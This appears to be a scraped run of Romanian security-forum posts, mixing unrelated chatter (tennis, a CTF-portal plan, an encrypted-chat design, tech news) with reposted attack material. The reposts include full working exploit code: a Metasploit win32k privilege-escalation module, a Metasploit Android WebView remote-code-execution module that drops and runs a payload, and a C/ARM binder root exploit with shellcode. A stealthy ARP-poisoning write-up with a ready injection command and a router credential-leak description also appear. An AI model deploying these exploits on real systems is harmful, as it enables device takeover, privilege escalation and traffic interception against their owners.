Nytro

Antivirusii de mult timp scaneaza arhivele cu parola "infected". S-a trezit si Gogu'. De asemenea, Kaspersky a patentat o metoda de scanare care identifica un fisier infectat intr-o arhiva cu parola (doar ei stiu cum, probabil nu e un algoritm tocmai simplu, insa tot heuristic ramane). Nu cred ca Google face ceva special in acest sens, asta doar daca nu cumva lucreaza la propriul antivirus. Pentru cei care nu stiu, ca si tipu asta, sunt site-uri care "colectioneaza" malware si permit accesul la aceste fisiere pentru analize. Ca malware.lu . Iar descarcarea acestor fisiere se face ca o arhiva zip cu parola "infected", sau cel putin asa se facea. Mai e si Mila: http://contagiodump.blogspot.ro/ La fel, folosea daca imi aduc bine aminte, aceeasi parola. Intre timp, a umblat putin la algoritmul de stabilire a parolei si mai adauga ceva la final.

[h=1]Windows TrackPopupMenuEx Win32k NULL Page[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows TrackPopupMenuEx Win32k NULL Page', 'Description' => %q{ This module exploits a vulnerability in win32k.sys where under specific conditions TrackPopupMenuEx will pass a NULL pointer to the MNEndMenuState procedure. This module has been tested successfully on Windows 7 SP0 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Seth Gibson', # vulnerability discovery 'Dan Zentner', # vulnerability discovery 'Matias Soler', # vulnerability analysis 'Spencer McIntyre' ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows 7 SP0/SP1', { } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ [ 'CVE', '2013-3881' ], [ 'OSVDB', '98212' ], [ 'BID', '62830'], [ 'MSB', 'MS13-081' ], [ 'URL', 'http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html' ], [ 'URL', 'http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html' ] ], 'DisclosureDate' => 'Oct 08 2013', 'DefaultTarget' => 0 })) end def check os = sysinfo["OS"] if (os =~ /windows/i) == nil return Exploit::CheckCode::Unknown end file_path = expand_path("%windir%") << "\\system32\\win32k.sys" major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") case build when 7600 return Exploit::CheckCode::Vulnerable when 7601 return Exploit::CheckCode::Vulnerable if revision <= 18126 when 9200 return Exploit::CheckCode::Safe end return Exploit::CheckCode::Unknown end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if check != Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end print_status("Launching notepad to host the exploit...") notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. print_status("Operation failed. Trying to elevate the current process...") process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-3881", "cve-2013-3881.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status("Payload injected. Executing exploit...") process.thread.create(exploit_mem + offset, payload_mem) print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end end Sursa: Windows TrackPopupMenuEx Win32k NULL Page

[h=1]Android Browser and WebView addJavascriptInterface Code Execution[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_flavor => "Android", :arch => ARCH_ARMLE, :javascript => true, :rank => ExcellentRanking, :vuln_test => %Q| for (i in top) { try { top[i].getClass().forName('java.lang.Runtime'); is_vuln = true; break; } catch(e) {} } | }) def initialize(info = {}) super(update_info(info, 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', 'Description' => %q{ This module exploits a privilege escalation issue in Android < 4.2's WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup). }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck', # original msf module 'joev' # static server ], 'References' => [ ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-'+ 'addjavascriptinterface-code-execution-vulnerability/'], ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'], ['URL', 'http://50.56.33.56/blog/?p=314'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+ 'addjavascriptinterface-remote-code-execution/'] ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { 'PrependFork' => true }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :os_flavor => "Android", :arch => ARCH_ARMLE } )) end def on_request_uri(cli, req) if req.uri.end_with?('js') print_status("Serving javascript") send_response(cli, js, 'Content-type' => 'text/javascript') else super end end def on_request_exploit(cli, req, browser) print_status("Serving exploit HTML") send_response_html(cli, html) end def js %Q| function exec(obj) { // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; // get the process name, which will give us our data path var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } path += '/#{Rex::Text.rand_text_alpha(8)}'; // build the binary, chmod it, and execute it m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); m.invoke(null, null).exec([path]); return true; } for (i in top) { if (exec(top[i]) === true) break; } | end def html "<!doctype html><html><body><script>#{js}</script></body></html>" end end Sursa: http://www.exploit-db.com/exploits/31519/

[h=1]Linux ARM - Local Root Exploit[/h] /* * Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282. * * Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable. * You need to customize the addresses so that they match the target board. On Android, both /proc/kallsyms and dmesg are * restricted, thus no automation here. * * Rigged up by Piotr Szerman. © 2013 * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mman.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> /* Binder transaction request format */ struct binder_write_read { signed long write_size; /* bytes to write */ signed long write_consumed; /* bytes consumed by driver */ unsigned long write_buffer; signed long read_size; /* bytes to read */ signed long read_consumed; /* bytes consumed by driver */ unsigned long read_buffer; } bwr; #define BR_NOOP 0x0000720c /* binder memory write value */ #define SC_TABLE 0xc000ee28 /* system call table address */ /* we need to know the lower halfword of the original address of sys_ni_syscall to tailor MMAP_AREA and MMAP_OFF accordingly. * you can aid yourself with a NOP block. the higher halfword will in any case become 0x720c. on one of my boxes, the other * halfword was 0xdac4. MMAP_AREA must be aligned appropriately. you can extract all the data in question at runtime from * /proc/kallsyms and dmesg (not that hard to set off infoleaks with this bug) as long as there are no contraints in place */ #define MMAP_AREA 0x720cd000 /* userspace landing point page-aligned address. */ #define MMAP_OFF 0xac4 /* offset within it to plant the payload */ #define NUM_PAGES 16 #define PAGE_SIZE 4096 #define NOP 0xe1a00000 /* mov r0, r0 */ #define SHELL "/system/bin/sh" #define TARGET_APERTURE 68 /* aiming for two adjacent non-implemented syscalls. check arch/arm/kernel/calls.S */ #define BINDER_WRITE_READ 0xc0186201 /* printk your BINDER_WRITE_READ */ /* the target payload */ void __attribute__((regparm(3))) shellcode(void) { asm volatile( "__transgressor:;" "push {r0-r12,lr}" "\n\t" "mov r1, sp" "\n\t" /* calculate the process descriptor location */ "bic r2, r1, #8128" "\n\t" "bic r2, r2, #63" "\n\t" "ldr r3, [r2, #12]" "\n\t" "movt r0, #0" "\n\t" "movw r0, #0" "\n\t" "ldr r1, [r3, #492]" "\n\t" /* cred's location may differ depending on the kernel config. * just build and objdump a kernel module with printk(current->cred->uid) * to find out. or pinpoint it with the help of kgdb or whatever */ "mov r4, #8" "\n\t" "__loop_cred:;" "sub r4, r4, #1" "\n\t" "str r0, [r1, #4]!" "\n\t" "teq r4, #0" "\n\t" "bne __loop_cred" "\n\t" "ldr r1, [r3, #488]" "\n\t" /* real_cred. overkill? */ "mov r4, #8" "\n\t" "__loop_real_cred:;" "sub r4, r4, #1" "\n\t" "str r0, [r1, #4]!" "\n\t" "teq r4, #0" "\n\t" "bne __loop_real_cred" "\n\t" "ldm sp!, {r0-r12,pc}" "\n\t" /* return to ret_fast_syscall */ "mov pc, lr" "\n\t" ); } int main(int ac, char **av) { char * const shell[] = { SHELL, NULL }; char *map; int fd; fprintf(stderr, "[!] binder local root exploit\n[!] © piotr szerman\n"); fd = open("/dev/binder", O_RDWR); if(fd < 0) { fprintf(stderr, "[-] failed to reach out for binder. (%s)\n", strerror(errno)); exit(EXIT_FAILURE); } map = mmap((void *)MMAP_AREA, NUM_PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_LOCKED, 0, 0); if(map == (void *)-1) { perror("mmap() "); exit(EXIT_FAILURE); } fprintf(stderr, "[+] userspace map area == 0x%08lx\n", (unsigned long)map); fprintf(stderr, "[+] placing NOP block at 0x%08lx\n", (unsigned long)map); memset(map, NOP, MMAP_OFF); fprintf(stderr, "[+] copying payload to 0x%08lx\n", (unsigned long)map + MMAP_OFF); /* look at the objdump of shellcode to see the correct offset */ memcpy(map + MMAP_OFF, (unsigned char *)shellcode + 8 /* offseting to the __transgressor */, 30 * sizeof(void *) /* copy all opcodes */); fprintf(stderr, "[+] constructing rogue data structure.\n"); bwr.write_size = 0; bwr.write_consumed = 0; bwr.read_size = 1; bwr.read_consumed = 0; /* targeting the aperture between 2 undefined system calls in the table */ bwr.read_buffer = (unsigned long)((unsigned char *)SC_TABLE + TARGET_APERTURE * sizeof(void *) + 2); /* calculate process descriptor address with the aid of sp: * task_struct = *( ((unsigned long *) ( (sp & ~(0xbf000000 - 1)) & ~0x3f )) + 3); */ ioctl(fd, BINDER_WRITE_READ, &bwr); close(fd); sleep(5); /* give binder ample time to service the transaction. if it's under heavy load, the exploit might fail */ fprintf(stderr, "[+] r00ting device...\n\n"); asm volatile( "mov r7, %0\n\t" "swi 0\n\t" : : "I" (TARGET_APERTURE) ); execve(shell[0], shell, NULL); return EXIT_FAILURE; } Sursa: http://www.exploit-db.com/exploits/31574/

Incearca pe Linux.

Nemesis is a command-line network packet crafting and injection utility for UNIX-like and Windows systems. Nemesis, is well suited for testing Network Intrusion Detection Systems, firewalls, IP stacks and a variety of other tasks. As a command-line driven utility, Nemesis is perfect for automation and scripting. Nemesis can natively craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP and UDP packets. Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected. [TABLE=width: 100%] [TR] [TD]Author:[/TD] [TD]Jeff Nathan <jeff@snort.org>[/TD] [/TR] [TR] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD]Source code:[/TD] [TD]nemesis-1.4.tar.gz (Build 26) (DSA sig)[/TD] [/TR] [TR] [TD]Windows binary:[/TD] [TD]nemesis-1.4.zip (Build 26) (DSA sig) (includes LibnetNT)[/TD] [/TR] [/TABLE] Sursa: nemesis.sourceforge.net - Packet injection tool suite

A More Powerful, Stealthier and Uncommon ARP Poisoning Technique ARP poisoning is a well-known technique used to perform MITM (man-in-the-middle) or DoS (denial of service) attacks on a LAN. You might think that every security researcher and every hacker knows this technique inside out. After all it is pretty simple. Send a spoofed ARP reply packet announcing "hey, you may or may not have asked for it, but I am X.X.X.X and my MAC address is YY:YY:YY:YY:YY:YY" and the target host receiving this packet will start sending traffic destined to X.X.X.X to whoever owns YY:YY:YY:YY:YY:YY on the LAN, typically a malicious host intercepting and/or modifying sensitive traffic. It is that simple. Or is it? A little-known variation of this classic poisoning attack is based on sending spoofed requests instead of replies. I am going to demonstrate that contrary to what the current literature describes, poisoning with ARP requests is noticeably more powerful and robust. Amongst other things, not only it works against all network stacks I tested (Windows 7 to 2000, Linux, OpenBSD, FreeBSD) but it also allows something that classic poisoning is unable to do: adding new ARP entries, in addition to overwriting existing ones. Description Let me start by quoting RFC 826, documenting ARP. It is not every day that one gets the opportunity to scrutinize a 30 years old RFC: Packet Reception: When an address resolution packet is received, the receiving Ethernet module gives the packet to the Address Resolution module which goes through an algorithm similar to the following. Negative conditionals indicate an end of processing and a discarding of the packet. ?Do I have the hardware type in ar$hrd? Yes: (almost definitely) [optionally check the hardware length ar$hln] ?Do I speak the protocol in ar$pro? Yes: [optionally check the protocol length ar$pln] Merge_flag := false If the pair is already in my translation table, update the sender hardware address field of the entry with the new information in the packet and set Merge_flag to true. ?Am I the target protocol address? Yes: If Merge_flag is false, add the triplet to the translation table. ?Is the opcode ares_op$REQUEST? (NOW look at the opcode!!) [...] Notice that the triplet is merged into the table before the opcode is looked at. This is on the assumption that communcation is bidirectional; if A has some reason to talk to B, then B will probably have some reason to talk to A. The RFC describes that the sender IP and MAC addresses are added to the table before looking at the opcode indicating whether it is an ARP request or reply. In other words: ARP poisoning can be performed with ARP requests, in addition to ARP replies. Another consequence of this behavior is that it is possible to insert new entries in the ARP table, in addition to overwriting existing ones, something that is usually described as impossible. Example You might be wondering if modern network stacks really do implement ARP this way. The answer is yes. I have successfuly exploited many different stacks in the past 10 years with this very technique. Namely: Windows 2000, XP, 2003, Vista, 2008, 7 Linux kernel 2.4, 2.6 OpenBSD 4.6 (also tested 2.x and 3.x back in the days) FreeBSD 4.x, 5.x (I have not tested newer versions but they are likely vulnerable as well) etc It is interesting that RFC 826 documents the behavior pretty clearly, yet no ARP poisoning tool seems to purposefully exploit this fact. To be more correct, Ettercap is probably the only one (see arp_poison_request setting), however even its implementation seems to be just a curiosity that has fallen into disuse, forgotten, and disabled by default (arp_poison_request=0 in etter.conf). As of May 10, 2010, before publishing this text, Googling "arp_poison_request" returned no results other than a few default etter.conf files accidentally indexed by the Googlebot. It is as if its developers realized it could work, but being unsure of its usefulness they disabled it by default and documented it as only "useful against targets that cache even arp request values". Not only they did not seem to realize it works against virtually any target, but more importantly I find no public mention of the multiple advantages of poisoning via ARP requests! Let me demonstrate the technique with the generic packet injection tool nemesis that I am going to use to craft an ARP packet from scratch. To insert or overwrite the entry (10.2.44.90, 00:de:ad:be:ef:00) in the ARP table of the target (10.2.32.1, 00:30:48:xx:xx:xx), run this command from the attacker's machine: $ nemesis arp \ -h 00:de:ad:be:ef:00 -S 10.2.44.90 \ -m 0:0:0:0:0:0 -D 10.2.32.1 \ -d eth0 -M 00:30:48:xx:xx:xx This will send the request "arp who-has 10.2.32.1 tell 10.2.44.90" while 10.2.44.90 pretends to have the MAC address 00:de:ad:be:ef:00. The Ethernet frame will have the destination MAC address 00:30:48:xx:xx:xx (to only poison this target instead of the whole broadcast domain), and will have the source MAC address of the attacker's eth0 NIC (which is 00:1f:e2:xx:xx:xx, but this is irrelevant). Here is a representation of the ARP request: Right before receiving the ARP request, the target does not know 10.2.44.90. The target in my example runs OpenBSD 4.6, so we can verify that it does not know about this IP with the arp command: $ arp -n 10.2.44.90 10.2.44.90 (10.2.44.90) -- no entry After receiving the ARP request, it gets poisoned: $ arp -n 10.2.44.90 ? (10.2.44.90) at 00:de:ad:be:ef:00 on bge0 Notice how this is a new entry that was created. Classic ARP poisoning cannot create new entries like this. At this point, another very nice thing about this poisoning technique is that the target will of course send back an ARP reply to 00:de:ad:be:ef:00. If you are the attacker, you will get a confirmation of successful poisoning, How practical! Here is the ARP reply: A couple remarks: An alternative version of the attack is that it can also work no matter what target IP address is used in the ARP request. In other words in this example if an "arp who-has x.x.x.x tell 10.2.44.90" was sent for any value of x.x.x.x, it would still poison, except that of course no ARP reply will be sent back because x.x.x.x is not an existent host. This alternative version works at least against Linux and OpenBSD. It does not work against Windows 7. I have not tested any other Unix or Windows version. In my example the ARP request packet had an Ethernet frame source MAC address of 00:1f:e2:xx:xx:xx which was different from the ARP sender MAC address 00:de:ad:be:ef:00. I made them different to demonstrate this is possible. But in practice they are often the same (ie. an attacker would want to inject his MAC 00:1f:e2:xx:xx:xx in the table instead of 00:de:ad:be:ef:00). However if the attacker really wants to inject 00:de:ad:be:ef:00, he may prefer to set the Ethernet frame source MAC address to 00:de:ad:be:ef:00 in order to match the ARP sender MAC address. This would be stealthier. With nemesis this can be by adding -H 00:de:ad:be:ef:00. Advantages Poisoning with ARP requests is advantageous for at least 4 reasons. Firstly, it can be used to inject new entries in ARP tables, in addition to overwriting existing ones. Classic poisoning with ARP replies can only do the latter; the entry has to exist in the table already (even if marked "incomplete" in the output of the arp command) before it can be poisoned. Classic poisoning makes the attacker blind as he does not know if the lack of intercepted network traffic is because an ARP entry was poisoned but there is no traffic, or because there was no ARP entry which caused the poisoning attempt to be unsuccessful. Poisoning with ARP requests makes ARP poisoning more powerful. Secondly, the ARP reply sent back by the target is a nice side-effect that be used by the attacker to get a positive validation of the success of ARP poisoning. It makes ARP poisoning more robust. Thirdly, the alternate version of the attack where an arbitrary x.x.x.x ARP target IP address is used in the ARP request makes it possible to poison many hosts on a LAN at once with a single ARP request packet that is naturally broadcasted to the entire LAN (like the normal usage of ARP). With classic poisoning, one would have to either broadcast an ARP reply (replies are not expected to be broadcasted, which may trigger IDS alerts, etc), or send one ARP reply to every host that needs to be poisoned (the volume of ARP replies might also trigger alerts, etc). Fourthly, noone seems to be very much aware of this ARP poisoning technique. Therefore the technique may be useful to evade detection as noone expects it to be used. Tcpdump does not show the ARP sender MAC address (not to be confused with the Ethernet frame source MAC address), even in verbose mode (-vvv), so a human reading logs might miss ARP poisoning attempts. Intrusion Detection Systems analyzing network traffic might not inspect "obviously unmalicious" ARP requests. I hope my blog post will raise awareness of poisoning based on ARP requests! mrb Monday 10 May 2010 at 02:25 am | ¶ | Default Sursa: A More Powerful, Stealthier and Uncommon ARP Poisoning Technique - Zorinaq

Halep s-a impus în finala de la Doha în fa?a nem?oaicei Kerber ?i a cî?tigat primul trofeu din 2014: liveTEXT ACUM Simona Halep - Angelique Kerber în finala de la Doha :: GSP.RO

Stiu ca majoritatea romanilor dar si strainilor au o parere negativa despre Romania. As vrea ca macar noi sa vedem si lucrurile bune si sa nu le uitam. Vreau ca aici sa facem o lista cu lucrurile pozitive despre Romania. Voi incepe prin 2 exemple de azi: 1. Simona Halep s-a calificat in finala turneului de tenis de la Doha: Halep: Sunt foarte mul?umit? de presta?ia mea, a fost un turneu incredibil - Mediafax 2. Dupa olimpiada de matematica, romanii sunt pe primul loc in Europa si pe locul 10 in lume: Romania’s brains rank first in Europe, 10th in the world after Math Olympiad | Romania-Insider.com Astept sa actualizati aceasta lista pe masura ce observati ca exista si parti bune in a fi roman, ca exista persoane cu care ne putem mandri. Va sfatuiesc sa evitati caterinca.

Toate aceste topicuri sunt de "Ajutor". Aveti deja o categorie pentru asa ceva. Cand o sa vad 2-3 articole postate de voi pe aceasta tema, dar nu probleme ale voastre la care asteptati o rezolvare, voi lua in considerare aceasta sugestie.

Aratati-mi cate 5 posturi facute de voi pe aceasta tema.

Da link.

Internetul cuantic – prima teleportare a datelor într-un spa?iu de stocare cuantic prin fibr? optic? Publicat de Andrei Av?d?nei O echip? european? de fizicieni au demonstrat cum un aparat poate teleporta informa?ie cuantic? c?tre un spa?iu de stocare SSQ(Solid-State Quantum) printr-o fibr? telecom, o capabilitate crucial? în viitorul internetului cuantic. Ce înseamn? teleportare cuantic?? Teleportarea cuantic? este capacitatea de a transmite ceva dintr-o loca?ie în alta f?r? a traversa spa?iul dintre cele dou?. Materia în sine nu realizeaz? c?l?toria, doar informa?ia ce o descrie. Aceasta este transmis? c?tre un corp nou ce preia identitatea originalului. Articol complet: Internetul cuantic – prima teleportare a datelor într-un spa?iu de stocare cuantic prin fibr? optic? | WORLDIT

Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu dezvoltatorii software Aurelian Mihai - 11 feb 2014 Viitoarele genera?ii de tablete ?i telefoane Samsung ar putea include o func?ie de monitorizare care înregistreaz? cu lux de am?nunte modul în care sunt folosite dispozitivele cu sistem Android. Identificat dup? numele Context, serviciul de monitorizare rezident în memoria dispozitivelor Samsung cu sistem Android va urm?ri permanent modul de folosire a aplica?iilor instalate ?i datele furnizate de senzorii telefonului. Suplimentar, vor fi colectate informa?ii despre preferin?ele utilizatorilor înregistrând cuvintele tastate pe ecran. Mai departe, Samsung ar putea pune informa?iile colectate la dispozi?ia dezvoltatorilor de aplica?ii pentru Android, cu scopul de a-i ajuta s? aduc? îmbun?t??iri ce r?spund mai bine nevoilor utilizatorilor. Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu produc?torii de aplica?ii pentru Android Desigur, serviciul Context va avea un rol ?i pentru majorarea veniturilor din publicitate, adaptând reclamele afi?ate în func?ie de interesele utilizatorilor. Spre exemplu, dup? o c?utare dup? re?ete de buc?t?rie am putea fi bombarda?i cu reclame pentru restaurante care servesc produsul respectiv gata preparat. Potrivit zvonurilor, introducerea serviciului Context a fost amânat? temporar, dup? ce o analiz? mai atent? a scos la iveal? temeri privind efectele negative pe care m?sura le-ar putea avea asupra vânz?rilor de telefoane Samsung. Via:Theverge.com Sursa: Samsung ar putea înregistra tot ce faci cu telefonul mobil ?i împ?r?i datele cu dezvoltatorii software

Via Andrei

https://www.youtube.com/watch?v=fvxqnQmahTA

Stergeti cookie-urile de la Yahoo si incercati din nou.

Eu voi participa atat la dezvoltarea scirptului PHP cat si la crearea challenge-urilor. La design nu pot ajuta.

Salut, In urma unei sugestii am decis ca ar fi o idee buna sa avem propriul portal CTF (Capture The Flag). Pentru cei care nu cunosc acest termen, CTF este un concurs unde participantii trebuie sa rezolve cat mai multe probleme si primesc puncte in functie de dificultatea acestora. Domeniile pe care problemele pot sa le acopere sunt foarte variate: hacking, steganografie, criptografie, programare, algoritmica si multe altele. Pentru dezvoltarea acestui proiect avem nevoie de persoane capabile sa: 1. dezvolte astfel de probleme (de preferat persoane care au participat la astfel de competitii si Hertz) 2. dezvolte un script PHP/MySQL, bine structurat, OOP, pentru managementul utilizatorilor si al challenge-urilor (cu experienta) 3. designeri pentru acest portal (Javascript/jQuery, CSS3, HTML5) Cei care au posibilitatea de a contribui la acest proiect sunt rugati sa imi dea PM sau sa posteze aici. De asemenea am dori sa oferim premii celor care ocupa primele locuri la finalul competitiei (un termen limita). Cu aceasta ocazie, cine are posibilitatea de a dona atat bani, cat si diverse licente sau servicii, e rugat sa imi dea un PM. Peste cateva zile, in functie de numarul persoanelor interesate, vom pune lucrurile in miscare. Astept PM sau postati aici (de preferat) daca puteti ajuta.

Sa nu va plangeti ca ati luat teapa ca aveti ban. Minim 50 de posturi pentru astfel de afaceri.

Unde mai e anonimitatea daca persoana cu care vorbesti iti stie IP-ul?

Da, stiu, RC4 are NISTE probleme, de aceea am spus ca cine il "sparge" are VIP. Pacat ca nu prea se mai foloseste.

RSA 4096 + AES 256 GCM. Am mai multa incredere in RSA decat in curbele eliptice. Mod de functionare: 1. Client -> Server (handshake, validare certificat server, validare certificat client) 2. Server -> Client 2 (la fel) 3. Client -> Client 2 (serverul actioneaza doar ca router. Se face handshake si se fac verificari de certificate pe clienti) Serverul va avea un CA pe baza caruia se va verifica certificatul acestuia. Fiecare user isi va genera propriul CA si cumva, il va oferi utilizatorului cu care doreste sa comunice. Validarea certificatelor se va face pe baza acestui certificat. ps-axl, tu de ce te vei ocupa? PS: Se poate opta pentru certificate platite, semnate de un root CA. Astfel, un user care are un site, www.vasile.com, isi ia certificat pentru acel site si certificatul e ulterior validat pe baza root CA-ului de care a fost semnat. In cazul acesta, root CA-ul este public si "transmiterea" acestuia este mult mai simpla. PS2: Astept de la cel care a zis ca SSL poate fi spart sa imi faca un demo cu RC4 cu cheia pe 56 de biti si sunt multumit, are VIP. Daca imi face un demo cu AES 128 bit si RSA 1024 bit are Administrator.

In sfarsit o idee buna. Hertz, tu ce parere ai?

Hacking and patching TP-LINK TD-W8901G router By piotrbania.com / 31.01.2014 Motivation Recently a critical vulnerability has been found in TP-LINK routers and few other router devices. This particular vulnerability to which I am referring was described here. Basically it is so called ROM-0 attack. In short attacker by requesting ROM-0 through HTTP request (ie. http://192.168.1.1/ROM-0) can download all important and secret data stored in your router. This includes your ADSL login/password combination, WIFI password and basically all of your configuration data. Actually I was a bit pissed at TP-LINK for this crap so I have decided to patch the vulnerability by myself. DISCLAIMER: Author takes no responsibility for any actions with provided informations or codes. Your are doing everything on your own responsibility. The list of vulnerable devices is presented below: TD-W8901G TD-8816 TD-W8951ND TD-W8961ND D-Link DSL-2640R ADSL Modem AirLive WT-2000ARM Pentagram Cerberus P 6331-42 ZTE ZXV10 W300 I had one of those devices (TD-W8901G) and I took this as a good fortune sign to start playing with hardware router hacking . My task was to patch this vulnerability and make the ROM-0 not downloadable. This was my pretty much first encounter with this type of stuff (and my first encounter with MIPS really). At this point I would like to thank hackerfantastic and robercik for some hardware hints. Serial connection Most of the routers (or embedded devices in general) have some sort of communication port designed to aid the manufactures with testing and debugging of the target device. This communication port is usually SERIAL (UART/RS232) or JTAG (EJTAG). In my case I was unable to find the JTAG (EJTAG) port but I have found the serial port instead (presented on images below). First of all this is some ugly ass soldering work (yes I did that). Ok now getting back to my initial point I have used PL2303 RS232<>USB converter to connect the serial port to the usb port of my computer. Putty is pretty decent for handling normal serial communication so I have used it as my default client (configuration: 115200/8/1/N). I was expecting to see some output in my putty but unfortunately I got nothing. So after some digging around and harassing few friends (ohayo!) I have found out that my voltage levels on RX and TX pins were too low (should be 3.3V). So after some further digging and looking on schematics of this board it became obvious that two resistors are missing (see image above). So I took a piece of wire and I have connected the empty pins together (in two places obviously). So now the voltage levels were correct and I was able to see the output in my terminal. Articol complet: PIOTRBANIA.COM :: Hacking and patching TP-LINK TD-W8901G router